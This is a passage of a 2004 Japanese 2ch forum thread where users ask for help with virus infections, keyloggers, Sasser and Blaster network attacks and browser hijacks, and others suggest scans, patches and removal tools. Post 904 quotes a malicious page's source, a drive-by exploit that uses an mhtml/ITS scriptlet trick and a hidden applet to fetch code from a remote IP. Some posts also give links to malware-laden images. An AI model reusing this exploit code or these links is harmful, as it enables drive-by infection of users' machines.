を実行した時、見た目的にはどうなるのでしょうか?ダブルクリック
しても何も起こらず「?」と思っているうちに感染しているものなの
ですか?それとも何か解凍しているような動きを見せたり、目的の
(偽装されている)動画なりグラフィックがきちんと見えたりするの
でしょうか?

859 :名無しさん@お腹いっぱい。:04/09/30 11:03:44
「?」と思っているうちに大抵感染します。

860 :名無しさん@お腹いっぱい。:04/09/30 11:05:42
>858
ものによる
表面上何も起こらない(裏ではきっちり作動している)ものもあるし
偽のエラーダイアログとか出すやつもいる
表向きは普通のアプリケーションで裏で別の動作するのもある

861 :858:04/09/30 11:45:32
>>859
>>860
なるほど。モノによるわけですね。ありがとうm(__)m

862 :名無しさん@お腹いっぱい。:04/09/30 12:09:17
パンダオンラインスキャンしてるけど
先生とBit君は反応なしだったよ
やばそうならC:\WINDOWS\system32\ActiveScanを捨てたらいいのかな
あとはレジストリが変更されてないか心配なんだが…
他の人はどうなってる?

863 :名無しさん@お腹いっぱい。:04/09/30 14:48:02
XPだけど最初のログイン画面でログインすると一瞬壁紙が写って自動的にログアウトしてしまいます。
ノートン入ってますし、別に異常はありませんでした。
お助けお願いします。

864 :名無しさん@お腹いっぱい。:04/09/30 14:51:25
ageますね

865 :名無しさん@お腹いっぱい。:04/09/30 15:57:30
>>863
う〜んそれはウイルス情報&質問スレに書く内容なのか?
最初のログイン画面というのもそれはXPユーザーのログインログオフのことか?
もう少し質問の仕方を勉強してからここで聞くといいよ。
 ↓
http://pc5.2ch.net/test/read.cgi/win/1096280267/

もしウイルスに心当たりがあるならばまずはスキャンしろ。
心当たりがないならまずはhttp://www.google.com/intl/ja/ここで探せ。グーグル大先生で8割がたはなんとかなるだろ

ほんと質問する側はそんな質問の仕方で答えてくれると思って聞いているのだろうか・・・・・
何も自分で調べず。どのスレに書き込めばいいかも考えず。自分のPC環境も示さず。
百歩譲ってスパイウェアとの違いがわからないのは許そう
だが俺たちは誘導部隊じゃねぇーんだよ。
ウイルスの字が見えないのかね
^^^^^^^^

866 :名無しさん@お腹いっぱい。:04/09/30 17:18:13
基本的には>>865ハゲドーだけど
初心者は何がわかんないのかすら わかんないってのも事実なんだよね。
だからって許される事ではないけど・・・

って事で質問者はこおテンプレに沿って質問するようにしてチョンマゲ

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】


867 :名無しさん@お腹いっぱい。:04/09/30 17:42:55
>>865-866
やっぱここに集まる奴は何だかんだ言っていい香具師だな。
865は手厳しいけどちゃんと誘導してあげてるし、866はよりやわらかく教えてあげてるしテンプレまでもう一度貼ってくれて。
うんうん。優しいな。そんなお前らが大好きだよ(´Д⊂グスン


868 :名無しさん@お腹いっぱい。:04/09/30 18:05:25
ノートンアンチウイルスが¥1,980

869 :名無しさん@お腹いっぱい。:04/09/30 18:46:06
ストリーミング再生中にウィルスを混入させることは可能ですか?
教えてください。

870 :名無しさん@お腹いっぱい。:04/09/30 19:04:35
初心者です・・助けてください
どうやらウィルスに感染した模様です。

メールに添付されていたファイルを開いたら感染したみたいです。
症状はIEではページが表示できなくなってしまったこととPC起動時の立ち上げに時間がかかるようになったことです。
2chブラウザやヤフーメッセンジャーとかは正常なんです。
最初感染しときに、デスクトップにMS-DOSのショートカット?が作られました。
で、そのショートカットの本体を探したんですが、見当たらず、ウザいのでショートカットは削除しました。
なにかのファイルを埋め込まれたようですが、どうすれば復旧できるでしょうか・・
お願いします

871 :名無しさん@お腹いっぱい。:04/09/30 19:07:36
>>870
>>866

たった4コ上のレスも読まんのかorz

872 :名無しさん@お腹いっぱい。:04/09/30 20:05:25
MS04-011_LSASS_EXPLOIT
MS03-026_RPC_DCOM_EXPLOIT

この二つのウイルスらしいのが何回も来るんですがなんなのでしょうか?
詳しい詳細が解る方、お教えください。

お願いします

873 :872:04/09/30 20:14:30
スミマセン書き直します

【使用OS】 WindowsXP SP2
【WindowsUpdateしてるか】 使用していています
【AntiVirusは何を使っているか】 ウイルスバスター2004
【ちゃんとUpdateしてるか】 自動更新です
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】 大丈夫でした
【症状を具体的に、分かる限りすべて書く】 今のところ被害なし
【何をしたらそんなことになったのか】 ネットに繋げたら頻繁に攻撃してきますが、バスターが
                       ブロックしてくれます。
【これまでにとった措置】 一応、手動ウイルススキャンしました
【その他の質問】MS04-011_LSASS_EXPLOIT
           MS03-026_RPC_DCOM_EXPLOIT

           この二つのウイルスらしいのが何回も来るんですがなんなのでしょうか?
詳しい詳細が解る方、お教えください。

お願いします !
どうしたらこの攻撃を回避できるでしょうか?


874 :名無しさん@お腹いっぱい。:04/09/30 20:26:30
>>873
バスターのメイン画面→パーソナルファイアーウォール→ネットワークウイルス緊急設定
を見てみ。そこにあるだろう?そこのURLクリックすればトレンドマイクロ
の解説ページに飛ぶから調べてみ。
あと、バスターのパーソナルファイアーウォールを有効にしといてくれ。
設定の仕方は自分で調べてね。

875 :名無しさん@お腹いっぱい。:04/09/30 20:30:14
>>873
他にも同じ症状がイパーイ。
ttp://okweb.jp/kotaeru.php3?q=1006254

876 :名無しさん@お腹いっぱい。:04/09/30 20:34:58
>>873
WindowsUpdateしてるなら気にすることはない。
ネットワーク緊急対策設定→“ネットワーク〜略〜表示する”のチェックをはずす。
チェックをはずしてもPWFが有効ならネットワークウイルスはブロックされているので問題ないよ。
SP2でこの問題が発生してるみたいだね。

877 :名無しさん@お腹いっぱい。:04/09/30 20:47:10
不具合満載なもんを自動うp立てしてくんなよなぁ
更新の準備ができました
ヽ(`Д´)ノうわーん

878 :872:04/09/30 20:57:37
>>874>>875>>876>>877
ありがとうございました!
取り合えず表示をしない様に設定しました。

本当にSP2はどうなってるんでしょうね?

879 :名無しさん@お腹いっぱい。:04/09/30 21:08:54
しかし、「質問テンプレつかって質問しなおしてくれ」って言ってるだけ(のつもり)
なのに、そのまま消えてしまう香具師って、どういうつもりなんだろう・・・?

880 :名無しさん@お腹いっぱい。:04/09/30 21:12:39
>>873
ルーターなどを使わずに直接インターネットへつないでいると
世界中からランダムにブラスター系のネットワークウイルスが飛んでくる

それをウイルスバスターのPFWが検出してブロックした報告がそれ。
報告はブロックした後なので、報告を表示しないようにしてもブロックはちゃんと行われる。

ただ、

>どうしたらこの攻撃を回避できるでしょうか?

というのなら、ルーターを買ってきて繋ぐしかないと思う。

881 :名無しさん@お腹いっぱい。:04/09/30 21:26:00
HPがエロサイトになってしまうのですが、
どうしたらよいでしょうか?
お願いいたします。

882 :名無しさん@お腹いっぱい。:04/09/30 21:29:39
>>881
mk:@MSITStore:C:\spe\start.chm::/start.html#

これになります。

883 :名無しさん@お腹いっぱい。:04/09/30 21:51:37
>>881
>>852のリンク先に行ったらOK。それでも無理ならまた来い

884 :名無しさん@お腹いっぱい。:04/09/30 21:51:39
>>880
自分のモデムには一応ルーター機能が付いてるんですけど
市販のルーターでなくても防げるのもなんでしょうか?


885 :876:04/09/30 21:56:20
>>878
>880さんの書き込みで自分の勘違いに気づきました。
セキュリティパッチ未適用かつ、ポート攻撃がある場合にMS04-011〜等が表示されるものだと
思い込んでいた。
実際はMS04-011〜等の脆弱性を突くウイルスが多数存在する為で、
一例を採ると“MS04-011_LSASS_EXPLOIT”が表示されたときブロックしたウイルスは
ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=MS04-011_MICROSOFT_WINDOWS&VSect=T
この内のどれかということでSP2だから表示されるという問題では無かったです。

886 :名無しさん@お腹いっぱい。:04/09/30 22:01:14
昨日からウイルスと格闘してます。
症状は、タスクマネージャーを見ると
5秒毎にcmd.exeが実行されてます。

ノートンでは検出しない、
レジストリでRUN関係のエントリ削除しまくって
もだめ(勝手にインストールされたserv_Uは
起動しなくなった)、やけくそでcmd.exe削除
してもだめ(削除してもすぐ復活する)。

いいかげんにくじけそうで、なにかちょっとでも
気づくことがあったら教えて頂たいです。

Windows2000でWinアップデートは最新です


887 :872:04/09/30 22:17:08
>>880>>885両氏
またまた有難う御座います!
>>880さん
取り合えずバスターで様子を見ておきます。
それでも酷い様だとルーターを導入してみます。
>>885さん
SP2だけの問題では無かったのですね。
最近MeからXPにしてSP2にアップロードしましてバスターも入れていたので
安心しきっていました。

でも、昨日まで滅多に攻撃が無かったのに、
今日になってこんなに酷い攻撃の多さなのでちょっとビックリしました。

888 :名無しさん@お腹いっぱい。:04/09/30 22:30:04
>>886
お前も>>872-873を見習え

889 :名無しさん@お腹いっぱい。:04/10/01 00:15:18
>>883
無理でした。
またお知恵を拝借いたしたいと思います。


890 :870:04/10/01 00:29:41
ちょっと席を外しておりました
では失礼をば

【使用OS】win2000
【WindowsUpdateしてるか】してるかどうか忘れました(してないかも)
【AntiVirusは何を使っているか】 ないです・・
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
・強制的にショートカットがデスクトップに作成された(ms-dosなんとかって名前)
・ IEではページが表示できなくなってしまった
・PC起動時の立ち上げに時間がかかるようになった
・2chブラウザやヤフーメッセンジャーとかは正常
【何をしたらそんなことになったのか】 ウィルスメールの添付ファイルを誤って開いてしまった
【これまでにとった措置】強制的に作られたショートカットを削除
【その他の質問】 特になし

おながいしまつ


891 :名無しさん@お腹いっぱい。:04/10/01 00:39:47
C\windows\sysdllディレクトリってウィルスに感染しないとできませんよね?


892 :名無しさん@お腹いっぱい。:04/10/01 00:44:16
>>890
ソースネクストって会社のねぇ、ウイルスセキュリティ2005っていう
とっても安いアンチウイルスソフトがあるんだ。それでねぇ、
この板にもスレが立ってるんだけど、使い続けてる人はみんな
楽しそうで仲がいいんだ。俺使ってないけど、微笑ましくてその
スレは毎日みてるよ。

つーか、まずはオンラインスキャンやってください。
ttp://www.symantec.com/region/jp/securitycheck/index.html
ttp://www.trendmicro.co.jp/hcall/index.asp

893 :名無しさん@お腹いっぱい。:04/10/01 00:44:19
>>886
フォーマット

894 :870:04/10/01 00:47:54
>>892
ありがとうございます
オンラインスキャンしたいんですが、ウィルスのためブラウザが使えないんです。
ページが表示されないんです。
2chブラウザとかは使えるので、ネットには接続されているんですが・・

895 :名無しさん@お腹いっぱい。:04/10/01 00:49:27
>>890
セーフモードで起動→オンラインスキャン→手動削除→( ゚Д゚)ウマー  だな。
健闘を祈る。
手動削除で自信がなかったらここにまたきなさい。
・怪しいメールはあけない
・アンチウイルスソフトを入れる→無料のもある

896 :名無しさん@お腹いっぱい。:04/10/01 00:50:57
>>892
おいっ!
っつーか感謝してるし・・・・・ 禿藁

897 :名無しさん@お腹いっぱい。:04/10/01 00:51:25
>>891
うん。download板へ行った方がいいねぇ・・・。

898 :名無しさん@お腹いっぱい。:04/10/01 01:56:49
ある結婚相談所が作った出会い系サイトのようなものがあって、そこのホームページを見た日だけ必ずといっていいほど非通知でのワン切り電話が掛かって来ます。これはスパイウエアかハッキングのようなものでしょうか?

899 :886:04/10/01 02:01:33
>>888
てめーはマイクロソフトのテクニカルサポートか。
必要な情報は本文中に書いてあるだろボゲェ。
鼻糞以下の脳みその癖にいっちょまえにレスするなや。

>>ヤクザ
手の施しようが無いからフォーマットするよ。。。。
まったく凶悪なウイルス作りやがって


900 :名無しさん@お腹いっぱい。:04/10/01 02:11:42
教えてください。アップデートしたXP使っているのですが、
ちょくちょくキーロガーのログファイル(?)がデスクトップ等に現れます。
定義ファイル更新したウィルスバスター2003とspybotでスキャンしても何も見つかりません。
問題のファイルは「}」等の一文字で拡張子もなく、見つけた分だけメモ帳で開いてみると
WINAMPとIEを使用した時のログばかりです。
というか今まさにこのログがデスクトップに現れやがりました。
[02:04:06 10/01/04][ ■2ch BBS .. - Microsoft Internet Explorer]
[http://www2.2ch.net/2ch.html]ではじまり、
半角英数の入力分しか記録してないようです。
全角部分はすべて{left}{up}{right}、あとは{Bkp}{Ent}
なにかアドバイスください・・・


901 :900:04/10/01 02:12:50
青くさせちゃってすいません・・・

902 :名無しさん@お腹いっぱい。:04/10/01 02:51:35
>>898
非通知のワン切りって、なんも意味ないような気がするけどなぁ。

>>900
タスクマネージャーで怪しげなタスクがないか確認してみて。

正常なタスク一覧
ttp://www003.upp.so-net.ne.jp/shigeri/speedup/speedup1.html
ttp://www.answersthatwork.com/Tasklist_pages/tasklist.htm

悪いけど寝るわノシ
起きてる回答者の方(いたら)よろしく〜

903 :名無しさん@お腹いっぱい。:04/10/01 03:14:09
>>886
TROJ_OTORUN.A ?
ウィルスバスターでは検知してくれるけどノートンは知らん。

904 :名無しさん@お腹いっぱい。:04/10/01 03:19:39
これをあやまって開いてしまったんですが、私のPCはもう感染してしまったのでしょうか。
ソースを表示してみると、へんなJAVAscriptの記述があったり・・・

http://213.159.117.133/dl/ms.php
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'?s-its:mhtml:file://c:\\nosuch.mht!http://213.159.117.133/dl/ms/x.chm::/x.htm'));
</script>
<applet width=1 height=1 ARCHIVE=loaderms.jar code=Counter></APPLET></body></html>

905 :名無しさん@お腹いっぱい。:04/10/01 05:54:59
とあるスレで画像URLをクリックしたら、それはウィルスとスパイウェアを送りつけてくる
悪質なサイトでした・・・
今のとこ被害はないのですが、セキュリティソフト入れてなかったため、多分感染してると思います
パソコンには会社の重要なファイルなどがあるので、消されてしまったりしたらやばいんですけど
まあ、それは自分がセキュリティ管理甘かったってのもありますが
被害が出た場合、こういう悪質なリンクを張る2chネラを刑事告訴なりできるのでしょうか?
それとも、リンク張る奴はいくら張っても何も対処されないままなのでしょうか?
よろしくおねがいします

906 :名無しさん@お腹いっぱい。:04/10/01 07:09:22
>>905
罰せられないこともないと思いますが
それは経済的損失がでないともちろんできません。
よっぽどのときは告訴すれば大丈夫です。
けれど2ちゃんねるは「転んでも泣かない」精神が必要なのでまずは対策からしっかりやらないと。

※告訴されるかもしれないからHDDをぶっとばすようなウイルスへのリンクを張る奴はそうそういません。

できれば仕事用のパソコンとネットなどをする用のパソコンで分ければいいと思います。
重要な書類が消えるってのはバックアップとればなんとかなります。
情報を流出する可能性のあるウイルスなどのためにもそうしたほうがいいです。
情報が流出した場合にはあなたに責任が降りかかってくるかもしれませんから。

907 :名無しさん@お腹いっぱい。:04/10/01 07:13:13
nycopを思い出すなぁ・・・

908 :905:04/10/01 07:52:11
>>906
そうですか、よかった

909 :名無しさん@お腹いっぱい。:04/10/01 09:36:13
>>905
重要なデータの入っているPCで2chに貼られているリンクをホイホイ
踏むあなたのセキュリティホールを埋める方が重要。
セキュリティソフト入れていても、新種亜種には無力です。
セキュリティを強化しても、中の人がざるなら意味無し。


910 :870:04/10/01 10:09:31
>>895
オンラインスキャンのサイトに書いてあるとおりに
レジストリやらいじってみたら、たぶん直ったみたいです!
ありがd!
勉強になりますた!

911 :892:04/10/01 13:26:03
>>910
良かったな!次はアンチウイルスソフトの導入だ!!
こんなのとか↓
【ソースネクスト】ウイルスセキュリティ2005 Part9【K7】
http://pc5.2ch.net/test/read.cgi/sec/1095983778/l50


912 :名無しさん@お腹いっぱい。:04/10/01 13:27:18
>>911
おぃおぃ。
苺キンタマに対応した?

913 :名無しさん@お腹いっぱい。:04/10/01 14:02:21
>>911
をいっw

914 :名無しさん@お腹いっぱい。:04/10/01 14:02:30
すみません、誤ってこれ踏んでしまったのですがノートンがトロイを発見しました。
そのメッセージが出た以外はインストール画面でOKとかはせずに電源を切りました。
これは感染してしまったのでしょうか?今ノートンでスキャンしてますがこれで検出されなければ問題ないですか?

915 :名無しさん@お腹いっぱい。:04/10/01 14:04:38
張り忘れました。誤って踏んでしまったのはこれです。(踏まないでください!)
ttp://with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg

916 :名無しさん@お腹いっぱい。:04/10/01 14:35:51
踏まないでください、つうならtまで抜けよ(゚Д゚)ゴルァ!!

917 :名無しさん@お腹いっぱい。:04/10/01 14:38:53
>>914
最新版でスキャンして見つからなければ一応OK。
ただスパイウェアなんかも入ってる可能性があるので、
ad-awareやspy-botでスキャンしておくと良いかも。

918 :名無しさん@お腹いっぱい。:04/10/01 14:56:46
>>917
2002でスキャン終了しましたが検出されませんでした。
ウィルス情報は機能最新のを更新しました。
このまま使い続けて大丈夫でしょうか?

919 :名無しさん@お腹いっぱい。:04/10/01 15:03:23
>>918
レジストリとか書き換えられてる可能性もあるから
トロイをまた呼び込んでくることも考えられる。
ときどきチェックした方が良いかも。

920 :名無しさん@お腹いっぱい。:04/10/01 19:03:27
質問者も回答者もカスばかり

921 :名無しさん@お腹いっぱい。:04/10/01 21:34:36
911
はどういうもの?
怖く踏めないけど、予防のために内容を知りたい。

922 :名無しさん@お腹いっぱい。:04/10/01 21:37:10
>>921
ウイルスセキュリティのスレだろ?
評判は以下略。

923 :名無しさん@お腹いっぱい。:04/10/01 21:56:39
>>920
ちっ、バレたか・・・。

>>921
安さの裏には何があるか?「予防のために」是非踏め。

924 :名無しさん@お腹いっぱい。:04/10/01 22:14:20
つかアドレスからして2ch内のスレだとわかるものが踏めないとはどういうことだ?

925 :名無しさん@お腹いっぱい。:04/10/01 22:15:38
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク

926 :名無しさん@お腹いっぱい。:04/10/01 23:33:58
ウイルスとかもそうだけどセキュリティホールがあってもそれを
守るOSレベルでOSと連動するようなセキュリティソフトないの?

927 :kirby???:04/10/02 00:07:39
なんつか、新種ウイルスって出た?
C:\直下にkirby.exeってできるん。そんで、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に名前service 値C:\kirby.exeの値設定されるん。
んで、ネットワークに接続確立してからすぐnetstat /nしてみると宛先ポート445で物凄い勢いでなんかパケット送ってるん。
宛先IPアドレスは、ランダムっぽいけど多分連番でスキャヌしてる雰囲気。
DELODERみたく、SMB使って脆弱パスワド試してるんか、SASSERみたくLSASS の脆弱性突いてるんかわからん。
kirby.exeのサイズは25KB
プロセス殺して、レヂストリ値消して、kirby.exe削除して再起動しるとネット繋ぐまでは何とも無いが、
ネット繋いだとたんまたC:\にカービィ.exe出来るん。
ノートンでkirby.exeスキャヌしてみると検出はするけど名前Backdoor.Trojanとしか出て来ないん。

知人の買ったばかりPCの設定いぢってて、あんまり調子悪いから調べてみたらこんなん出ました。。。
メール送受信の設定どう考えても上手くいかなくて小一時間三十分悩んだん。。。
OSはXPホームでSP1。後は知らん。ログインパスワドたぶん無し。アンチVIRは何も無いん。
・・・・だから初心者買ったばかりXPいぢるの嫌なんぢゃ〜!!
新種で流行しそうだったら誰か新スレ立ててねん。



928 :kirby???:04/10/02 00:20:49
ぁ、ちなみにノトンの定義ファイルは最新だよん。

929 :名無しさん@お腹いっぱい。:04/10/02 00:43:15
>>928
普通はそんなところにそんなファイル無いよね。


930 :名無しさん@お腹いっぱい。:04/10/02 00:43:49
>>927
検出してるのに新種のわけあるまい
親玉がサーバーからインストールしてるだけジャン

931 :名無しさん@お腹いっぱい。:04/10/02 00:45:07
>>927
トレンドマイクロのオンラインスキャンではどう出るの?

932 :kirby???:04/10/02 01:05:02
>>931
何も検出されません。
他のオンラインスキャヌも試してみるでつ。

>930
チッチッチ


933 :kirby???:04/10/02 01:28:23
ぁぁ、アンテドート簡易版だと
TrojanProxy.Win32.Agent.bjと出まつねん。

934 :名無しさん@お腹いっぱい。:04/10/02 01:50:19
>>933
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_AGENT.BJ
これ?

935 :kirby???:04/10/02 02:09:36
>>934
なんか違うっぽいでつ。
知人Pcなんで今は他の値とか確認出来ないでつ。
とりあえず、知人PCにはMS04-011パッチでも当ててみて様子見るでつ。
明日仕事忙しいので寝まつ。zzz

936 :名無しさん@お腹いっぱい。:04/10/02 09:59:01
>>935
単にトロイ仕込まれてるだけじゃん
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.trojan.html

937 :名無しさん@お腹いっぱい。:04/10/02 10:19:53
知人から「ウィルス感染したようなのでPCを見てほしい」とだけ頼まれて、
いま下調べしてる者です。

OSはおそらくXPで、症状は「なんど起動してもOSが強制終了になる」とだけ
聞いています。強制終了前にカウントダウンがあるか、どんなメッセージが
出るかまでは聞きそびれてしまいました。

SasserまたはBlasterの関連かと予想してはいるのですが、
カウントダウンなしにOSが急に落ちるような(上記とは別のタイプの?)ウィルス
情報はあがってますか? どうぞお願いします。

938 :名無しさん@お腹いっぱい。:04/10/02 10:24:15
>>937
てか、まずスキャンしてみるのが早いと思いまつ。
アンチドート簡易版でもオンラインスキャンでもいいですから。

939 :名無しさん@お腹いっぱい。:04/10/02 10:28:43
即レス!どうもです。

そうですね。今日みにいく予定ですので、まずはOLスキャンをしてみる
つもりです。ありがとうございます。
ただ、急にOSが落とされるようなタイプだとスキャン中に往生してしまうかな
などと思いまして。。。  追加情報ありましたらおながいします


940 :名無しさん@お腹いっぱい。:04/10/02 10:37:32
追加情報じゃなくてスマソですが、何にせよWindows Updateなんかのセキュ対策教えたり
アンチウィルス買わせなきゃダメっすね

甘やかしたらこの先ずっとお助けマンとしてこき使われますぞ

941 :名無しさん@お腹いっぱい。:04/10/02 10:51:38
>急にOSが落とされるようなタイプだとスキャン中に往生してしまうかな

トレンドマイクロ ダメージクリーンナップサービス
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=4700
これ入れたFDなど用意してはいかがでしょうか。

942 :名無しさん@お腹いっぱい。:04/10/02 11:13:40
>941
それはいいかもしれませんな。SasserやBlasterの活動だって一時的に
止められますからな。
本格的な駆除は別途実施しなくちゃいかんですがな。

943 :名無しさん@お腹いっぱい。:04/10/02 11:17:36
代理質問は効率が悪いので本人を降臨させろ

944 :名無しさん@お腹いっぱい。:04/10/02 11:21:18
そんなに無防備なPCだと他にもスパイウエアとかイパーイ仕込まれてそうな悪寒
>>937の週末がこれで潰れなきゃEが(((((((( ;゚Д゚)))))))

945 :937:04/10/02 11:25:23
みなさまどうも。イチローキターをしてたら遅くなりました。
とくに>>941さん、さっそくFDに入れました。試してみます。

さて逝ってきます。

946 :名無しさん@お腹いっぱい。:04/10/02 12:47:19
>>945
いっちゃったか
そういうなのはハードウェアに問題がある場合も多い罠

947 :名無しさん@お腹いっぱい。:04/10/02 16:38:22
知人と言う奴は大抵本人が感染してる

948 :ヘッポコ初心者:04/10/02 18:50:50
ノートンインターネットセキュリティ2004
をいれています。
Backdoor.Coreflood が発見され、削除しようとしても
削除されないのですがどうすればよいのでしょうか?
教えてください



949 :名無しさん@お腹いっぱい。:04/10/02 18:50:53
>>939
知人のPCはどうでもいいが、OLスキャンの結果報告はしてほしいな

950 :名無しさん@お腹いっぱい。:04/10/02 18:51:50
>>948
http://www.symantec.com/region/jp/search/index.html

951 :ヘッポコ初心者:04/10/02 18:57:35
すみません、もう少し詳しく教えてください

952 :名無しさん@お腹いっぱい。:04/10/02 19:02:14
>>951
PestPatrolを導入したらどうかな?
私の友人が同様にバックドア系に感染し困っていたのだが・・
PestPatrolで簡単に駆除できました。

餅は餅屋でがよろいしかとおもいます。
統合型ツールの導入は安い反面、防衛力に少し難があるのではないかな?

953 :名無しさん@お腹いっぱい。:04/10/02 19:07:15
>>952
社員乙

954 :ヘッポコ初心者:04/10/02 19:14:32
952さんお返事ありがとうございます。
初心者で感染も始めてで、よくわからないのですが、
どのような事に気を付ければ防げるのでしょうか?

955 :名無しさん@お腹いっぱい。:04/10/02 19:27:05
>>954
初心者初心者言って調べる気がないなら
セキュリティ初心者質問スレッドpart47
http://pc5.2ch.net/test/read.cgi/sec/1095637802/
こっち行け

956 :名無しさん@お腹いっぱい。:04/10/02 19:50:49
>>955
そこに誘導するな
断る

>>954
こっちに行け
PC初心者
http://pc6.2ch.net/pcqa/

957 :937:04/10/02 21:59:12
戻ってきました。
>>947 本人じゃなーい。
自分はAVG,Spybot,Ad-awareの3本セットでふんばってるんじゃ。

…実は当人、ノートン先生を「持っていた」ようで、auto_tscでウィルス活動を
とめ、OLスキャン→先生インストール→退治 と成功しました。
出てきたのはもろもろ100匹ほどで、想像したほど多くなかったのは
Windows Updateだけはやっていたからでしょうか。
Sasserの中の人みたいのはいましたが、それが主因だったかどうかは
不明です。

いろいろお世話になりました。依頼主が女の子でないのがあれですが。

958 :名無しさん@お腹いっぱい。:04/10/02 22:40:28
>>957はお礼にやらないか?と言われてやってきた模様です

959 :名無しさん@お腹いっぱい。:04/10/02 22:43:02
ウイルス感染してレジストリが変更され
ウイルスを消してレジストリが変更されたままになっている時に
オンラインスキャンした場合、ひっかかるのですか?

960 :名無しさん@お腹いっぱい。:04/10/02 22:45:07
>>959
マルチ

961 :959:04/10/02 22:56:55
>>960
Download版から飛ばされてきました
ぜひ教えてくださいm(_ _)m


962 :名無しさん@お腹いっぱい。:04/10/02 22:59:26
>>959
レジストリ検索するスキャンなら引っかかるのでは?

963 :961:04/10/02 23:13:42
>>962
いつもSymantecのオンラインスキャンしか使わないんですけど
レジストリ検索するスキャンしてますよね?

964 :名無しさん@お腹いっぱい。:04/10/02 23:21:12
てか、オンラインスキャンでレジストリまでスキャンされるなんて(ry


965 :名無しさん@お腹いっぱい。:04/10/03 00:52:35
>>961
download板にカエレ

966 :名無しさん@お腹いっぱい。:04/10/03 08:55:38
HTML_REDIR.Aのファイル名ぉιぇτ

967 :名無しさん@お腹いっぱい。:04/10/03 09:41:06
HTML_REDIR.A

968 :名無しさん@お腹いっぱい。:04/10/03 12:41:22
決まったファイル名などない

969 :名無しさん@お腹いっぱい。:04/10/03 16:08:23
>>966
その過去の脆弱性を利用しているインストールファイルは全部その名前だ
それよりもウィンドウズアップデート位しろ

970 :名無しさん@お腹いっぱい。:04/10/03 18:04:12
777 :名無しステーション :04/10/03 17:36:40 ID:6SIqEWMR
http://with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg
和田のホームラン

実況板で釣られてウィルスにやられた・・・_| ̄|○

IEでHPなどを開こうとすると必ず変なページに行かされるのだが、対処法がわからん。

ウィスルソフトでも駆除できないので困っています^^;

971 :名無しさん@お腹いっぱい。:04/10/03 18:07:54
>>970
かわいそうに






















何釣られてんだ?( ´,_ゝ`)

972 :名無しさん@お腹いっぱい。:04/10/03 18:08:51
http://www.cty-net.ne.jp/~taitiro/imgboard/data/img20040825044524.jpg
これウイルスらしいんだが

973 :名無しさん@お腹いっぱい。:04/10/03 18:24:44
>>970
PestPatrolを導入すれば直るね。

974 :名無しさん@お腹いっぱい。:04/10/03 18:27:36
>>972
7種類のウィルスですね。

感染するバカがいるといけないから、削除依頼出しておけよ。


975 :名無しさん@お腹いっぱい。:04/10/03 18:28:00


976 :名無しさん@お腹いっぱい。:04/10/03 18:28:50
>>972
通報しました

977 :名無しさん@お腹いっぱい。:04/10/03 18:46:12
>>970
今さら言っても遅いけど2CHのリンクはIEで開くのは嚴禁。


978 :名無しさん@お腹いっぱい。:04/10/03 19:20:45
>>970 ここにも書き込まなくちゃ
*.full-tgp.net
これを制限付きサイトに突っ込んであるので痛くも痒くもないんですが?

979 :名無しさん@お腹いっぱい。:04/10/03 19:59:58
なんかネットに繋ぐとIEが自動的に
ttp://www.superlawntrucks.com/T.html
ってページ開くようになってしまったんですがこれウイルス?
いつのまにかTT.exeなるアプリケーションがマイコンピュータ内にあるしorz

980 :名無しさん@お腹いっぱい。:04/10/03 20:44:17
>>970>>972
まとめて通報しました

981 :名無しさん@お腹いっぱい。:04/10/03 20:45:55
>>979
ブラウザジャッカー?
ウイルスというより、スパイウェアかも


982 :名無しさん@お腹いっぱい。:04/10/03 20:46:56
>>979
エロイ

983 :名無しさん@お腹いっぱい。:04/10/03 21:16:40
>>979
テンプレ読んで実行後質問
じゃなきゃ糞カスフンて言われる

エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/


984 :名無しさん@お腹いっぱい。:04/10/04 06:30:10
うむ。

985 :名無しさん@お腹いっぱい。:04/10/04 21:10:11
ていうか
親孝行>>>>マザコン
だな。親を気遣うだけでマザコンと呼ばれる最近の風潮はどうかと・・・・

986 :名無しさん@お腹いっぱい。:04/10/04 21:16:15
そろそろ次スレお願いしマツ。

987 :名無しさん@お腹いっぱい。:04/10/04 21:27:20
今だ!2ゲットー >>1
 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄       (´´
     ∧∧   )      (´⌒(´
  ⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡
        ̄ ̄  (´⌒(´⌒;;


988 :名無しさん@お腹いっぱい。:04/10/05 00:11:13
早めに流して次に移行した方がよさげかな

989 :名無しさん@お腹いっぱい。:04/10/06 01:03:16
キンタマウイルスの削除方法がわからないのですが・・・。
ttp://www.geocities.jp/ichigo_kintama/ ここ見たけれどあまりわかりません
OSはMEです、どなたか教えて下さいまし_| ̄|○

990 :名無しさん@お腹いっぱい。:04/10/06 01:22:49
>>989
これは試した?

http://www.ewido.net/en/


991 :名無しさん@お腹いっぱい。:04/10/06 02:39:25
>>989
ny利用者板違い

992 :名無しさん@お腹いっぱい。:04/10/06 11:20:01
OLスキャン・・・・エヘヘヘヘ

993 :名無しさん@お腹いっぱい。:04/10/06 23:19:47
次スレ
1.Sasser・Blaster・Netsky.Qの情報削除
2.質問テンプレ>>85or>>86追加(どっちにするかはスレ立て人の判断に任す)
3.怪しげなサイトへの直リン禁止(h抜きでOK)を明記
って感じか?



994 :名無しさん@お腹いっぱい。:04/10/07 01:28:33
